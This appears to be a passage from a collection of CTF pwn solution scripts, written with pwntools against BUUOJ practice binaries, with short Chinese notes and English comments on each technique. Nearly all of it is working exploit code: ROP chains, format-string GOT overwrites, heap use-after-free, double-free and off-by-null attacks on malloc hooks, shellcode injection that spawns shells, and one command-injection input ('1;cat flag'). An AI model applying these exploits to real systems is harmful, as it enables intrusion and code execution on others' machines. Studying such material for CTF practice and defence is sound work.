libc_base = puts_leak - libc.sym['puts']
log.success(hex(libc_base))
one = libc_base+0x45216
# Stage 2: return straight into the one-gadget.
payload = 'a'*0xd8+p64(one)
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27349)
elf = ELF('./orw')
bss = elf.bss()
# open/read/write only (the target presumably runs the input under a seccomp
# filter that allows just those calls — the name suggests it); shellcode is
# read into bss and printed from there.
shellcode = shellcraft.open('flag')
shellcode += shellcraft.read(3,bss,0x200)
shellcode += shellcraft.write(1,bss,0x200)
print(shellcode)
shellcode = asm(shellcode)
r.sendline(shellcode)
r.interactive()
uaf
from pwn import *
r = remote('node3.buuoj.cn',27529)
#r = process('./itemboard')
elf = ELF('./itemboard')
# 0x3c4b20 (main_arena offset) below is specific to this libc build.
libc = ELF('/libc-2.23.so')
def add(name,size,des):
    """Menu option 1: add an item `name` with a `size`-byte description `des`."""
    for prompt, reply in (('choose', '1'), ('name', name), ('len', str(size)), ('Description?', des)):
        r.recvuntil(prompt)
        r.sendline(reply)
def list():
    """Menu option 2: list items.

    Note: this shadows the builtin `list` for the rest of the module; kept
    as-is because callers would reference it by this name.
    """
    r.recvuntil('choose')
    r.sendline('2')
def show(index):
    """Menu option 3: print item `index`."""
    for prompt, reply in (('choose', '3'), ('Which item?', str(index))):
        r.recvuntil(prompt)
        r.sendline(reply)
def free(index):
    """Menu option 4: remove item `index`."""
    for prompt, reply in (('choose', '4'), ('Which item?', str(index))):
        r.recvuntil(prompt)
        r.sendline(reply)
add('fuck',0x400,'wdnmd')
add('fuck',0x40,'wdnmd')
add('fuck',0x40,'wdnmd')
# Use-after-free (note above): show(0) still prints the freed 0x400
# description, whose first word is now an unsorted-bin fd into main_arena.
free(0)
show(0)
r.recvuntil('Description:')
main_arena = u64(r.recvuntil('\n',drop=True).ljust(8,'\x00'))-88
libc_base = main_arena-0x3c4b20
log.success(hex(libc_base))
system = libc_base+libc.sym['system']
log.success(hex(system))
free(1)
free(2)
# The new 0x18-byte description reuses a freed item record: "/bin/sh;" as
# the name pointer target, then a function pointer set to system; free(1)
# invokes the stale record's pointer. Mitigation: clear records on free.
add('aaaa',0x18,'/bin/sh;'+'a'*8+p64(system))
free(1)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',29463)
elf = ELF('./level1')
# 32-bit chain: read(0, bss, 0x100) then return into bss, so the second line
# (shellcode) executes there — only possible with NX disabled.
payload = 0x8c*'a'+p32(elf.plt['read'])+p32(elf.bss())+p32(0)+p32(elf.bss())+p32(0x100)
r.sendline(payload)
r.sendline(asm(shellcraft.sh()))
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn', 26795)
#r = process('./level3_x64')
elf = ELF('./level3_x64')
libc = ELF('/libc-2.23.so')
padding = 'a' * (0x80 + 0x8)
pwn_addr = 0x4005E6
write_plt = elf.plt['write']
write_got = elf.got['write']
write_libc = libc.symbols['write']
# read_plt and mprotect_libc are computed but never used below.
read_plt = elf.plt['read']
mprotect_libc = libc.symbols['mprotect']
pop_rdi_ret = 0x4006b3
pop_rsi_p_r_ret = 0x4006b1
# Stage 1: write(1, write@GOT, 8) then return to the vulnerable function.
payload = padding
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_p_r_ret) + p64(write_got) + p64(8)
payload += p64(write_plt)
payload += p64(pwn_addr)
r.recvuntil('Input:\n')
r.sendline(payload)
leak_addr = u64(r.recv(8))
libc_base = leak_addr - write_libc
mprotect = libc_base + libc.symbols['mprotect']
log.success(hex(libc_base))
# Stage 2: one-gadget at 0xf02a4 (libc 2.23 specific).
payload = padding+p64(libc_base+0xf02a4)
r.sendline(payload)
r.interactive()
var可以添加add等已存在函数
from pwn import *
r = remote('node3.buuoj.cn',27249)
# The target lets `var` redefine an existing function such as add (note
# above); the string value here is raw machine code, and the later '+'
# presumably dispatches to add and runs it. Mitigation: reject redefinition
# of builtins and never treat string data as executable.
payload = 'var add = \"'+asm(shellcraft.sh())+'\"'
r.recvuntil('>')
r.sendline(payload)
r.sendline('+')
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',29175)
# Opaque 24-byte shellcode; disassembled at runtime for inspection only.
shellcode = '\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05'
print(disasm(shellcode))
r.recvuntil("[*]Location:")
# The target prints its own buffer address, defeating ASLR for the stack;
# the payload pads to 0x28 and returns into that buffer (NX must be off).
buf_addr = int(r.recvuntil('\n',drop=True), 16)
payload = shellcode.ljust(0x28,'\x90') + p64(buf_addr)
r.recvuntil('[*]Command:')
r.sendline(payload)
r.interactive()
from pwn import *
start = 0x400550
r = remote('node3.buuoj.cn',27634)
#r = process('./main')
libc = ELF('./libc-2.27.so')
elf = ELF('./main')
r.recvuntil('inputz: \n')
# Format-string leak (%2$p) and a 0x48-byte overflow in one input: the leak
# is a libc pointer at a fixed distance from __after_morecore_hook, and the
# return address is set to _start so the program runs again.
payload = '%2$pfuck'.ljust(0x48, 'a') + p64(start)
r.sendline(payload)
libc_base = int(r.recvuntil('fuck',drop=True), 16) +0x10-libc.sym['__after_morecore_hook']
log.success(hex(libc_base))
one = libc_base + 0x4f322
# Second pass: overflow into the one-gadget.
r.recvuntil(': ')
r.sendline(('a'*0x48 + p64(one)))
r.interactive()
add时size没验,可以malloc(0)
在这a2=0,a2-1=-1,无符号数比较,产生溢出
// Decompiled read loop. `i` is unsigned, so with a2 == 0 the bound `a2 - 1`
// wraps to 0xffff…ffff and the loop keeps storing into a1 until the
// terminator `a3` arrives — an unbounded write for the malloc(0) case (note
// above). Fix: reject a2 == 0 before the loop, e.g.
// `if (a2 == 0) { *(char *)a1 = 0; return 0; }`, and loop on `i + 1 < a2`.
unsigned __int64 __fastcall sub_4009BD(__int64 a1, __int64 a2, char a3)
{
char v4; // [rsp+Ch] [rbp-34h]
char buf; // [rsp+2Fh] [rbp-11h]
unsigned __int64 i; // [rsp+30h] [rbp-10h]
ssize_t v7; // [rsp+38h] [rbp-8h]
v4 = a3;
for ( i = 0LL; a2 - 1 > i; ++i ) // unsigned compare: a2 == 0 -> no bound
{
v7 = read(0, &buf, 1uLL);
if ( v7 <= 0 )
exit(-1);
if ( buf == v4 )
break;
*(i + a1) = buf;
}
*(a1 + i) = 0;
return i;
}
只能add3次,先add三个,第一个把fakechunk的一部分布置好,第二个是可以溢出的chunk,free后再申请可以回来溢出,布置剩下的fakechunk
from pwn import *
r = remote('node3.buuoj.cn',28075)
#r = process('./note2')
elf = ELF('./note2')
libc = ELF('/libc-2.23.so')
#context.log_level = 'debug'
def add(size,content):
    """Menu option 1: create a note of `size` bytes (size 0 is the bug, see above)."""
    r.sendlineafter('option--->>', '1')
    r.sendlineafter('(less than 128)', str(size))
    r.sendlineafter('content:', content)
def show(index):
    """Menu option 2: print note `index`."""
    r.sendlineafter('option--->>', '2')
    r.sendlineafter('note:', str(index))
def edit(index,content):
    """Menu option 3, sub-option 1 (overwrite): replace note `index` with `content`."""
    r.sendlineafter('option--->>', '3')
    r.sendlineafter('note:', str(index))
    r.sendlineafter('2.append', '1')
    r.sendline(content)
def free(index):
    """Menu option 4: delete note `index`."""
    r.sendlineafter('option--->>', '4')
    r.sendlineafter('note:', str(index))
# Note-pointer table entry for note 0; fd/bk of the fake chunk point 0x18/0x10
# below it for unlink()'s FD->bk == P == BK->fd check.
ptr = 0x602120
r.sendline('wdnmd')
r.sendline('nmsl')
fake_chunk = p64(0)#prev_size
fake_chunk += p64(0xa1)#size
fake_chunk += p64(ptr-0x18)#fd
fake_chunk += p64(ptr-0x10)#bk
add(0x80,fake_chunk)
# add(0) hits the unsigned wrap in sub_4009BD() above: the content read is
# unbounded and can reach into note 2's header.
add(0,'fuck')
add(0x80,'fuck')
free(1)
# Re-take the size-0 note and overflow it with the tail of the fake chunk:
# prev_size 0xa0 / size 0x90 for note 2 with prev_inuse cleared.
fake_chunk = p64(0)*2
fake_chunk += p64(0xa0)#prev_size
fake_chunk += p64(0x90)#size
add(0,fake_chunk)
free(2)#unlink
# Table slot 0 now points into the table; aim it at atoi@GOT and read it.
edit(0,'a'*0x18+p64(elf.got['atoi']))
show(0)
r.recvuntil('is ')
libc_base = u64(r.recv(6).ljust(8, '\x00')) - libc.symbols['atoi']
log.success(hex(libc_base))
system = libc_base+libc.sym['system']
# atoi@GOT := system. Mitigation: reject size 0 in the reader, full RELRO.
edit(0,p64(system))
r.sendline('/bin/sh\x00')
r.interactive()
unsortedbin attack打magic
from pwn import *
# Unsorted-bin attack target (note above).
r = remote('node3.buuoj.cn',26152)
#r = process('./magicheap')
def add(size,content):
    """Menu option 1: allocate `size` bytes holding `content`."""
    r.sendlineafter(':', '1')
    r.sendlineafter(':', str(size))
    r.sendlineafter(':', content)
def edit(index,size,content):
    """Menu option 2: write `size` bytes of `content` into chunk `index` (size is caller-chosen)."""
    r.sendlineafter(':', '2')
    r.sendlineafter(':', str(index))
    r.sendlineafter(':', str(size))
    r.sendlineafter(':', content)
def free(index):
    """Menu option 3: release chunk `index`."""
    r.sendlineafter(':', '3')
    r.sendlineafter(':', str(index))
# Global the menu checks before handing out the flag (option 4869).
magic = 0x6020A0
add(0x80,'fuck')
add(0x80,'fuck')
add(0x80,'fuck')
free(1)
# edit() with a size larger than chunk 0 overruns into the freed chunk 1 and
# sets its bk to magic-0x10; the next malloc of that size unlinks chunk 1 from
# the unsorted bin and writes an arena address into `magic` (non-zero is all
# the check needs). Mitigation: size-checked edit; glibc >= 2.29 validates
# unsorted-bin links.
payload = 'a'*0x80+p64(0)+p64(0x91)+p64(0)+p64(magic-0x10)
edit(0,0x100,payload)
add(0x80,'fuck')
r.sendline('4869')
r.interactive()
fastbin double free
👴寻思能直接打到got表,但是magic写进去直接崩,所以👴选择malloc_hook
from pwn import *
r = remote('node3.buuoj.cn',28995)
#r = process('./secretgarden')
# 0x3c4b78 (main_arena+0x58) below is specific to this libc build.
libc = ELF('/libc-2.23.so')
elf = ELF('./secretgarden')
def add(size,name,color):
    """Menu option 1: plant a flower with a `size`-byte `name` (sent raw) and `color`."""
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Length of the name :')
    r.sendline(str(size))
    r.recvuntil('The name of flower :')
    r.send(name)
    r.recvuntil('The color of the flower :')
    r.sendline(color)
def visit():
    """Menu option 2: print the garden (used to read the leaked fd)."""
    r.recvuntil('Your choice :')
    r.sendline('2')
def free(index):
    """Menu option 3: remove flower `index` (the record is not cleared, hence the double free below)."""
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('garden:')
    r.sendline(str(index))
def clean():
    """Menu option 4: clean up removed flowers."""
    r.recvuntil('Your choice :')
    r.sendline('4')
#context.log_level = 'debug'
magic = 0x400c5e
add(0x90,'fuck','nmsl')
add(0x60,'fuck','nmsl')
# Leak: a freed 0x90 chunk goes to the unsorted bin; re-allocating it with
# 8 bytes of name leaves its bk (main_arena+0x58) right after the name.
free(0)
clean()
add(0x90,'a'*8,'nmsl')
visit()
r.recvuntil('a'*8)
libc_base = u64(r.recv(6).ljust(8,'\x00'))-0x3c4b78
log.success(hex(libc_base))
malloc_hook = libc_base +libc.sym['__malloc_hook']
log.success(hex(malloc_hook))
# Fastbin double free (note above): free(2), free(3), free(2) bypasses the
# "top of bin" check. The re-taken chunk's fd is set to malloc_hook-0x23,
# where a 0x7f byte passes as a 0x70-size header, so the fourth add()
# returns memory overlapping __malloc_hook and writes `magic` there.
# Mitigation: clear the record on free; glibc >= 2.32 safe-linking; hooks
# removed in 2.34.
add(0x68,'wdnmd','nmsl')
add(0x68,'wdnmd','nmsl')
add(0x68,'wdnmd','nmsl')
free(2)
free(3)
free(2)
add(0x68,p64(malloc_hook-0x23),'nmsl')
add(0x68,'wdnmd','nmsl')
add(0x68,'wdnmd','nmsl')
add(0x68,'a'*0x13+p64(magic),'nmsl')
r.interactive()
先搞出来一个unsortedbin,fd有main_arena+88,继续申请能申请到main_arena+88,main_arena+88的地址就会写到heap_store,然后改fd打到heap_store改main_arena+88一字节到malloc_hook,同时把rwx页地址写上去,然后写shellcode再写malloc_hook
from pwn import *
# No-leak target; the strategy is spelled out in the note above.
r = remote('node3.buuoj.cn',29770)
#r = process('./QCTF_2018_NoLeak')
elf = ELF('./QCTF_2018_NoLeak')
def add(size,data):
    """Menu option 1: allocate `size` bytes and send `data` raw (no newline)."""
    r.recvuntil('Your choice :')
    r.sendline('1')
    r.recvuntil('Size: ')
    r.sendline(str(size))
    r.recvuntil('Data: ')
    r.send(data)
def free(index):
    """Menu option 2: release chunk `index` (repeatable: the slot is not cleared)."""
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Index: ')
    r.sendline(str(index))
def edit(index,data):
    """Menu option 3: write len(`data`) bytes of `data` into chunk `index` (raw send)."""
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('Index: ')
    r.sendline(str(index))
    r.recvuntil('Size: ')
    r.sendline(str(len(data)))
    r.recvuntil('Data: ')
    r.send(data)
# Opaque 29-byte shellcode (bytes as given on the page).
shellcode = '\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05'
# Pointer-table base (heap_store in the note above); 0x601000 is the start
# of that writable page.
fuck_addr = 0x601030
add(0x80,'fuck')
add(0x80,'fuck')
# Repeated free of the same index: with the tcache full, the chunk reaches
# the unsorted bin and its fd/bk become main_arena addresses.
for i in range(8):
free(0)
add(0x80,p64(0)+p64(0x601030))
add(0x80,'wdnmd')
free(0)
# Poison the freed chunk's next pointer with the table address so the
# following allocation hands back the table itself.
edit(0,p64(0x601030))
add(0x80,'fuck')
# Rewrite the table: slot 0 -> 0x601000 (shellcode destination), and a
# single-byte change on the arena pointer (the '\x30') per the note above.
add(0x80,p64(0)*2+p64(0x601000)+p64(0)*2+'\x30')
edit(0,shellcode)
edit(3,p64(0x601000))
r.interactive()
# Not reached until the interactive session ends; left over from a variant.
for i in range(7):
free(2)
r.interactive()
白给
1
1;cat flag
from pwn import *
r = remote('node3.buuoj.cn',26362)
elf = ELF('./echo')
system_plt = elf.plt['system']
printf_got = elf.got['printf']
# Format-string write: printf@GOT := system@PLT, so the echo of the next
# input becomes system("/bin/sh"). Mitigation: constant format strings,
# full RELRO.
payload = fmtstr_payload(7, {printf_got: system_plt})
r.sendline(payload)
r.sendline('/bin/sh\x00')
r.interactive()
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
# Target offers a "Where What?" write primitive (see fuck() below).
r = remote('node3.buuoj.cn', 27888)
def fuck(addr, val):
    """Use the target's 'Where What?' prompt to store byte `val` at address `addr`."""
    r.recvuntil('Where What?')
    r.sendline('%s %s' % (hex(addr), str(val)))
shellcode = asm(shellcraft.sh())
# Byte-by-byte write of shellcode into the text segment at 0x400769, which
# only works if that page is writable; the final write at 0x400768
# presumably patches the preceding instruction so execution falls into it
# (confirm by disassembling). Mitigation: W^X text, address validation.
addr = 0x400769
for i in range(len(shellcode)):
fuck(addr+i,ord(shellcode[i]))
fuck(0x400768, 0xff)
r.interactive()
0x6020E0储存note存在的标志和name和堆指针,输入name时有off-by-null,可以把堆指针覆盖为以\x00结尾的堆指针,造成uaf
from pwn import *
r = remote('node3.buuoj.cn',29000)
#r = process('./X-nuca_2018_0gadget')
elf = ELF('./X-nuca_2018_0gadget')
# Offsets below (one-gadget 0x4f322, main_arena via __malloc_hook+0x10+96)
# assume this libc build.
libc = ELF('/libc-2.27.so')
def add(size,title,content):
    """Menu option 1: create a note of `size` bytes with `title`, `content` and a fixed remark."""
    r.sendlineafter('Your choice: ', '1')
    r.sendlineafter('note size: ', str(size))
    r.sendlineafter('the title: ', title)
    r.sendlineafter('the content: ', content)
    r.sendlineafter('REMARK: ', 'nmsl')
def free(index):
    """Menu option 2: delete note `index`, answering the remark prompt."""
    r.sendlineafter('Your choice: ', '2')
    r.sendlineafter('to delete: ', str(index))
    r.sendlineafter('REMARK: ', 'nmsl')
def show(index):
    """Menu option 3: print note `index`; the remark is sent without waiting for its prompt."""
    r.sendlineafter('Your choice: ', '3')
    r.sendlineafter('to show: ', str(index))
    r.sendline('nmsl')
add(0x90,'fuck','nmsl')#0
add(0x90,'fuck','nmsl')#1 unsortedbin
# Title of 0x90 bytes: the off-by-null described above truncates the stored
# heap pointer of this record, so it aliases another chunk (use-after-free).
add(0x40,'a'*0x90,'nmsl')#2
add(0x90,'fuck','nmsl')#3
add(0x90,'fuck','nmsl')#4
add(0x90,'fuck','nmsl')#5
add(0x90,'fuck','nmsl')#6
add(0x90,'fuck','nmsl')#7
add(0x90,'fuck','nmsl')#8
add(0x90,'fuck','nmsl')#9
# Fill the tcache bin (7 frees) so the final free(1) lands in the unsorted
# bin with arena pointers; show(2) reads them through the aliased pointer.
free(0)
for i in range(3,9):
free(i)
free(1)
show(2)
r.recvuntil('note content: ')
libc_base = u64(r.recv(6).ljust(8,'\x00'))-96-0x10-libc.sym['__malloc_hook']
one = libc_base+0x4f322
malloc_hook = libc_base+libc.sym['__malloc_hook']
log.success(hex(libc_base))
log.success(hex(malloc_hook))
# Same truncation again with a 0x40 note, then a double free through the two
# aliased records; the poisoned tcache entry returns __malloc_hook, which is
# overwritten with the one-gadget. Mitigation: fix the off-by-null; tcache
# double-free key check (2.29+), safe-linking (2.32+), hooks removed (2.34).
add(0x40,'wdnmd','nmsl')
add(0x40,'b'*0x90,'nmsl')
add(0x40,'wdnmd','nmsl')
free(0)
free(1)
add(0x40,'wsnd',p64(malloc_hook))
add(0x40,'wsnd',p64(malloc_hook))
add(0x40,'wsnd',p64(one))
r.interactive()
👴记得这题比赛的时候是libc-2.23,buu上是2.27但也能做
开局给一个Mmap,rwx,那👴必往这里头写shellcode
malloc时heap_store地址白给,那👴就能得到基址但是👴只需要heap_store地址
edit有off-by-null,👴可以overlap
0-7 7个0xf8,8放一个0x68,9还是0xf8,10随便放个和topchunk隔开
free0-7,9准备进unsortedbin,edit8 off-by-null改9 prev_size和prev_inuse
free 9,然后取回来,又在0x68的地址申请了一个0x68,然后👴可以uaf,先打heap_store,把heap_store地址写到heap_store
然后👴需要申请到malloc_hook
heap_store可控,可以通过修改一字节控制堆指针,利用unsortedbin把main_arena+96写到一个free的tcache,然后改一字节到malloc_hook,把Mmap写进去
from pwn import *
r = remote('node3.buuoj.cn',25970)
#r = process('./sctf_2019_easy_heap')
elf = ELF('./sctf_2019_easy_heap')
libc = ELF('/libc-2.27.so')
context(log_level = 'debug', arch = 'amd64', os = 'linux')
def add(size):
    """Menu option 1: allocate `size` bytes (the target prints the address, see below)."""
    r.sendlineafter('>> ', '1')
    r.sendlineafter('Size: ', str(size))
def free(index):
    """Menu option 2: release chunk `index`."""
    r.sendlineafter('>> ', '2')
    r.sendlineafter('Index: ', str(index))
def edit(index,content):
    """Menu option 3: rewrite chunk `index` (off-by-null on the terminator, per the note above)."""
    r.sendlineafter('>> ', '3')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Content: ', content)
# The target hands out an RWX mapping and the address of each allocation,
# which removes both the leak and the code-injection hurdle (note above).
r.recvuntil('Mmap: ')
mmap_addr = int(r.recvuntil('\n',drop=True),16)
log.success(hex(mmap_addr))
add(0xf8)#0
r.recvuntil('Address 0x')
# Program base from the printed heap_store address (PIE binary).
base = int(r.recvuntil('\n',drop=True),16) - 0x202068
log.success(hex(base))
log.success(hex(base+0x202060))
add(0xf8)#1
add(0xf8)#2
add(0xf8)#3
add(0xf8)#4
add(0xf8)#5
add(0xf8)#6
add(0xf8)#7
add(0x68)#8 fuck_chunk
add(0xf8)#9
add(0x20)#10
# Fill the 0x100 tcache bin with chunks 0-6 so chunk 7 goes to the unsorted
# bin; the off-by-null in edit(8) then clears chunk 9's prev_inuse and sets
# prev_size to span back over 7 and 8, so free(9) consolidates all three.
for i in range(0,7):
free(i)
free(7)
edit(8,p64(0)*12+p64(0x170))
free(9)
for i in range(7):
add(0xf8)
add(0xf8)
# Chunk 8 is now reachable through two indices (9 aliases it): use-after-free.
add(0x68)#9
free(8)
edit(9,p64(base+0x202060))
add(0x68)
add(0x68)#11
add(0xf8)
add(0xf8)
for i in range(0,8):
free(i)
add(0xf8)
add(0xf8)
add(0xf8)
add(0xf8)
add(0xf8)
add(0xf8)
add(0xf8)
add(0xd0)
# Index 11 overlaps heap_store, so edits through it rewrite the pointer
# table; single-byte edits then steer freed-chunk links toward
# __malloc_hook (note above).
payload = p64(0x88)+p64(base+0x2020e0)#0
payload += p64(0x88)+p64(base+0x2020f0)#1
edit(11,payload)
edit(0,p64(0x88)+'\x40')#8
edit(1,p64(0x88)+'\x40')#9
free(8)
add(0x20)
edit(9,'\x30')
add(0x10)#14
add(0x10)#15 malloc_hook
# Shellcode goes into the RWX mapping, __malloc_hook points at it, and the
# next malloc (free(14) triggers it via the target's own path) runs it.
# Mitigation: no RWX mappings, no address disclosure, fix the off-by-null.
edit(11,p64(0x88)+p64(mmap_addr))#0
edit(0,asm(shellcraft.sh()))
edit(15,p64(mmap_addr))
free(14)
r.interactive()
0x00000000004008cc : ldp x19, x20, [sp, #0x10] ; ldp x21, x22, [sp, #0x20] ; ldp x23, x24, [sp, #0x30] ; ldp x29, x30, [sp], #0x40 ; ret
0x00000000004008ac : ldr x3, [x21, x19, lsl #3] ; mov x2, x22 ; mov x1, x23 ; mov w0, w24 ; add x19, x19, #1 ; blr x3
from pwn import*
elf = ELF('./2018_babyarm')
context.binary = elf
r = remote('node3.buuoj.cn',28107)
#r = process(['qemu-aarch64', '-L', '/usr/aarch64-linux-gnu', './2018_babyarm'])
# Fixed addresses: non-PIE AArch64 binary. The two gadgets are the
# __libc_csu_init register-load / call pair listed above.
shellcode_addr = 0x411068
bl_mprotect = 0x4007e0
gadget1 = 0x4008cc
gadget2 = 0x04008ac
# Name buffer: a pointer to the mprotect call stub, a zero, then shellcode.
shellcode = p64(bl_mprotect)+p64(0)+asm(shellcraft.aarch64.sh())
r.recvuntil('Name:')
r.sendline(shellcode)
sleep(0.1)
# 0x48-byte overflow into the csu gadgets: they load x19..x24 from the stack,
# then call [x21] with arguments that make the page at 0x411000 RWX
# (values 0x411000, 0x1000, 0x7 in the order the gadget loads them) and
# finally return into the shellcode at shellcode_addr+0x10.
# Mitigation: canary, PIE, no writable+executable remaps.
payload = 'a'*0x48+p64(gadget1)+p64(0)+p64(gadget2)
payload += p64(0)*2+p64(shellcode_addr)+p64(0x7)+p64(0x1000)+p64(0x411000)
payload += p64(0)+p64(shellcode_addr+0x10)
r.sendline(payload)
r.interactive()
from pwn import *
# Local run is active; the remote line is commented out.
r = process('./vote')
#r = remote('node3.buuoj.cn', 25145)
# Offsets below (main_arena 0x3c4b20, one-gadget 0xf1147) assume this libc.
libc = ELF('/libc-2.23.so')
elf = ELF('./vote')
def add(size, name):
    """Action 0: create a candidate with a `size`-byte `name`."""
    r.sendlineafter('Action: ', '0')
    r.sendlineafter("Please enter the name's size: ", str(size))
    r.sendlineafter('Please enter the name: ', name)
def show(index):
    """Action 1: print candidate `index` (works on freed entries, see below)."""
    r.sendlineafter('Action: ', '1')
    r.sendlineafter('Please enter the index: ', str(index))
def free(index):
    """Action 4: delete candidate `index`."""
    r.sendlineafter('Action: ', '4')
    r.sendlineafter('Please enter the index: ', str(index))
add(0xb0,'fuck')
add(0xb0,'fuck')
# Use-after-free leak: the freed record's "time" field now holds an
# unsorted-bin link (main_arena+0x58), printed as a decimal integer.
free(0)
show(0)
r.recvuntil('time:')
leak = int(r.recvuntil('\n',drop=True))
main_arena = leak - 0x58
libc_base = main_arena - 0x3c4b20
log.success(hex(libc_base))
# Carve the freed 0xb0 region into fake 0xd1 / 0x71 headers so a 0x70-sized
# fastbin chunk can be freed twice (double free) from overlapping records.
add(0x50,'fuck')
add(0x10,'fuck')
free(1)
add(0x50, p64(0)*3+p64(0xd1))
add(0x70,'fuck')
free(1)
add(0x50, p64(0)*5+p64(0x71))
free(1)
free(2)
free(4)
# fd := main_arena-0x33 (== __malloc_hook-0x23, where a 0x7f byte serves as
# the size); the last add() returns memory over the hook and writes the
# one-gadget after 3 alignment bytes. The next allocation request (action 0)
# triggers it. Mitigation: clear pointers on free; safe-linking (2.32+).
add(0x50,p64(0)*3+p64(0x71)+p64(main_arena-0x33))
add(0x50,'fuck')
add(0x50,'fuck')
one = libc_base + 0xf1147
payload = 'a'*0x3 + p64(one)
add(0x50, payload)
r.sendline('0')
r.recvuntil('size:')
r.sendline('1')
r.interactive()
ulimit -f 0,程序不能写出任何内容,urandom得到的passcode为空,这时直接跑otp会File size limit exceeded (core dumped),用python把otp作为子进程跑
# Run the target as a Python child process under a 0-byte file-size limit:
# the note above explains that the limit empties the urandom-derived
# passcode, and that running ./otp directly in the limited shell is killed by
# the "File size limit exceeded" signal instead.
ulimit -f 0 && python -c "import os; os.system('./otp 0')"
from pwn import *
r = remote('node3.buuoj.cn',28776)
# 10-byte pad then a fixed code address over the return slot (non-PIE, no
# canary inferred from the layout). Mitigation: bounded read, canary, PIE.
payload = 'a'*10+p64(0x00400807)
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28281)
elf = ELF('watevr_2019_voting_machine_2')
# Format-string write via the Topic field: exit@GOT := 0x08420736 (argument
# index 8, two bytes already printed). Mitigation: constant format strings,
# full RELRO.
payload = 'aa'+fmtstr_payload(8, {elf.got['exit']:0x08420736}, numbwritten=2)
r.recvuntil('Topic: ')
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28032)
# Indentation below is reconstructed: the original listing has none.
# Buy items 0..13 in turn, answering the '$4' prompt each time.
for i in range(14):
    print(i)
    r.recvuntil('buy/return:')
    r.sendline(str(i))
    r.recvuntil('$4')
    r.sendline('$4')
# Repeat return-then-buy of item 0 until the printed balance reaches 3; at
# that point buy item 14 and hand the session to the user.
while True:
    r.recvuntil('balance: ')
    balance = int(r.recvuntil('\n',drop=True))
    log.info(balance)
    if balance == 3:
        r.sendline('14')
        r.recvuntil('$4')
        r.sendline('$4')
        # NOTE(review): no break after interactive(); when the session ends
        # the loop resumes on a closed tube and the next recvuntil raises.
        r.interactive()
    # Return item 0 (confirm with 'yes'), then buy item 0 again.
    r.recvuntil('buy/return:')
    r.sendline('0')
    r.recvuntil('?')
    r.sendline('yes')
    r.sendline('0')
    r.recvuntil('$4')
    r.sendline('$4')
from pwn import *
r = remote('node3.buuoj.cn',28170)
libc = ELF('/libc-2.27.so')
elf = ELF('./2018_code')
# First input line; its role is not visible from this listing (presumably a
# string the program checks before continuing).
r.sendline('wyBTs')
r.recvuntil('to save')
# 0x78 filler bytes, then in-binary addresses around puts' GOT entry.  The
# 0x4009xx / 0x4005xx values only make sense for a non-PIE build — confirm.
payload = 'a'*0x78+p64(0x400983)+p64(elf.got['puts'])+p64(0x400570)+p64(0x400801)
r.sendline(payload)
# Six bytes printed after 'Success\n', zero-padded to a qword, are taken as
# puts' runtime address; libc_base follows from the symbol offset.
r.recvuntil('Success\n')
leak = u64(r.recv(6).ljust(8,'\x00'))
libc_base = leak-libc.sym['puts']
# Second overflow: same filler, then a hard-coded libc-2.27 offset (0x4f322).
payload='a'*0x78+p64(libc_base+0x4f322)
r.sendline(payload)
r.interactive()
off by null overlapping
one_gadget不好使,打free_hook改system
from pwn import *
r = remote('node3.buuoj.cn',28123)
#r = process('./X-nuca_2018_offbyone2')
elf = ELF('./X-nuca_2018_offbyone2')
# The 0x3ebca0 offset used later in this script assumes this libc-2.27 build.
libc = ELF('/libc-2.27.so')
def add(size,note):
    """Menu option 1: allocate a note of *size* bytes holding *note*."""
    r.recvuntil('>> ')
    r.sendline('1')
    r.recvuntil('length: ')
    r.sendline(str(size))
    r.recvuntil('note:')
    r.sendline(note)
def free(index):
    """Menu option 2: delete the note at *index*."""
    r.recvuntil('>> ')
    r.sendline('2')
    r.recvuntil('index: ')
    r.sendline(str(index))
def show(index):
    """Menu option 3: print the note at *index*."""
    r.recvuntil('>> ')
    r.sendline('3')
    r.recvuntil('index: ')
    r.sendline(str(index))
# Indentation below is reconstructed: the original listing has none.
# Seven 0xf0 notes (indices 0-6), then notes 7 (0xf0), 8 (0x88), 9 (0xf0)
# and 10 (0xa0).  Seven matches the per-bin tcache count — presumably why
# this number is used; confirm against the libc.
for i in range(7):
    add(0xf0,'fuck')
add(0xf0,'fuck')
add(0x88,'nmsl')
add(0xf0,'fuck')
add(0xa0,'wdnmd')
for i in range(7):
    free(i)
free(7)
free(8)
# Re-take the 0x88 slot with 0x80 filler plus the qword 0x190; per the note
# above this is the off-by-null write that the following free(9) relies on.
add(0x88,'a'*0x80+p64(0x190))
free(9)
for i in range(7):
    add(0xf0,'fuck')
add(0xf0,'wdnmd')
show(0)
# Take the six bytes ending in 0x7f from the output as a libc pointer; 0x3ebca0
# is the build-specific (libc-2.27) distance back to the base.  Unvalidated.
libc_base=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebca0
log.success(hex(libc_base))
system = libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
log.success(hex(free_hook))
add(0x88,'fuck')
free(9)
free(0)
# Three 0x88 notes, as the note above says: point at free_hook, store
# "/bin/sh", then write system's address.
add(0x88,p64(free_hook))
add(0x88,'/bin/sh\x00')
add(0x88,p64(system))
# Freeing the "/bin/sh" note is what triggers the hook.
free(9)
r.interactive()
堆溢出改虚表地址
from pwn import *
r = remote('node3.buuoj.cn',27536)
#r = process('./zoo')
elf = ELF('./zoo')
# Loaded but not referenced anywhere in the visible script.
